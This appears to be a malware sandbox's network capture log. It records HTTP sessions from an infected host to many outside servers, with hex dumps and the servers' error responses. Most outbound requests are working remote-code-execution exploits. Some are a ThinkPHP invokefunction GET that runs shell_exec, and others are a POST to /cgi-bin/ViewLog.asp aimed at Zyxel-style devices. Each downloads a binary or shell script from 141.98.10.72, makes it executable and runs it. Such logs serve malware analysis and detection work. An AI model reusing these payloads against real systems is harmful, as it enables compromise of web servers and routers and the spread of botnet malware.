                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 65 33 66 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 34 26 23 34 36 3b 33 36 32 31 33 39 30 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6e3f655f&#46;1707899414&#46;36213904</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      575192.168.2.154643695.101.78.6980
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.535525084 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:14.738217115 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:14 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:14 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 35 34 65 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 34 26 23 34 36 3b 31 39 65 36 63 66 36 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;454e655f&#46;1707899414&#46;19e6cf60</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      576192.168.2.155804095.216.30.5080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.753452063 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:14.973453999 CET295INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 08:27:49 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 150
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      577192.168.2.155232695.153.45.13680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.754812956 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:14.976289034 CET338INHTTP/1.1 400 Bad Request
                                                      Server: nginx
                                                      Date: Wed, 14 Feb 2024 11:07:19 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 166
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      578192.168.2.153411495.79.100.4080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.762773991 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:14.992703915 CET555INData Raw: 55 4e 4b 4e 4f 57 4e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 43 68 65 63 6b 20 50 6f 69 6e 74 20 53 56 4e 20 66 6f 75 6e 64 61 74 69 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74
                                                      Data Ascii: UNKNOWN 400 Bad RequestServer: Check Point SVN foundationContent-Type: text/html; charset=UTF-8Date: Wed, 14 Feb 2024 08:30:14 GMTLast-Modified: Wed, 14 Feb 2024 08:30:14 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      579192.168.2.154885031.104.174.1198080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.764703035 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      580192.168.2.153277885.239.66.908080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.780545950 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      581192.168.2.155687295.86.102.4080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.786062956 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      582192.168.2.154257431.136.18.1418080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.786217928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:15.480779886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:16.824740887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:19.544780970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:24.920566082 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:35.672231913 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:57.687851906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:40.694439888 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      583192.168.2.155693031.43.30.628080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.798357964 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:15.031523943 CET94INHTTP/1.1 404 Not Found
                                                      Date: Wed, 14 Feb 2024 08:30:14 GMT
                                                      Connection: Close


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      584192.168.2.156090495.84.128.1548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.800116062 CET268INHTTP/1.0 400 Bad Request
                                                      Server: httpd
                                                      Date: Wed, 14 Feb 2024 08:30:14 GMT
                                                      Content-Type: text/html
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      585192.168.2.154062894.180.118.1108080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:14.825504065 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      586192.168.2.153414095.79.100.4080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:15.221167088 CET555INData Raw: 55 4e 4b 4e 4f 57 4e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 43 68 65 63 6b 20 50 6f 69 6e 74 20 53 56 4e 20 66 6f 75 6e 64 61 74 69 6f 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74
                                                      Data Ascii: UNKNOWN 400 Bad RequestServer: Check Point SVN foundationContent-Type: text/html; charset=UTF-8Date: Wed, 14 Feb 2024 08:30:15 GMTLast-Modified: Wed, 14 Feb 2024 08:30:15 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      587192.168.2.1551112119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:16.186988115 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:47Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      588192.168.2.1539940112.83.37.17780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:16.369827986 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:16.692302942 CET135INHTTP/1.1 403 Forbidden
                                                      Server: uvlive/6.4.2 Rev13
                                                      Connection:close
                                                      Content-Length: 0
                                                      Access-Control-Allow-Origin: *


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      589192.168.2.153879288.221.105.18580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:16.578437090 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:16.787584066 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:30:16 GMT
                                                      Date: Wed, 14 Feb 2024 08:30:16 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 39 36 39 64 64 35 38 26 23 34 36 3b 31 37 30 37 38 39 39 34 31 36 26 23 34 36 3b 38 62 64 61 63 33 61 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b969dd58&#46;1707899416&#46;8bdac3a0</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      590192.168.2.154181688.28.177.6480
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:16.641449928 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:16.940058947 CET536INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:30:17 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 128
                                                      Connection: close
                                                      X-Frame-Options: sameorigin
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Strict-Transport-Security: max-age=31536000
                                                      Referrer-Policy: no-referrer
                                                      Permissions-Policy: geolocation=(), microphone=()
                                                      Content-Security-Policy: default-src 'self'
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      591192.168.2.1551244119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:16.875627041 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 34 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:47Auth Result: ????.


